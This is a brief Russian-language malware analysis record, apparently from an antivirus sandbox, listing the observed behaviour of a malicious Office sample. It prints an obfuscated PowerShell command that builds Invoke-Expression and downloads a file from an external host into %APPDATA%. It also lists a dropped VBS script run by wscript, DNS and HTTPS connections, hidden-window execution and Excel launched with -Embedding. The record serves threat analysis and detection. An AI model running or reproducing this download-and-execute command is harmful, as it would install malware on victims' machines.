Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $G1='()EX'.replace('()','I'); sal Bo $G1;'(&('+'G'+'C'+'M'+' *W'+'-O'+'*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://cvcviagens.sslblindado.com/docxs.txt'',$env:APPDATA+''...
- %APPDATA%\hjjh.vbs
- 'cv######ns.sslblindado.com':443
- DNS ASK cv######ns.sslblindado.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\hjjh.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $G1='()EX'.replace('()','I'); sal Bo $G1;'(&('+'G'+'C'+'M'+' *W'+'-O'+'*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://cvcviagens.sslblindado.com/docxs.txt'',$env:APPDATA+''...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding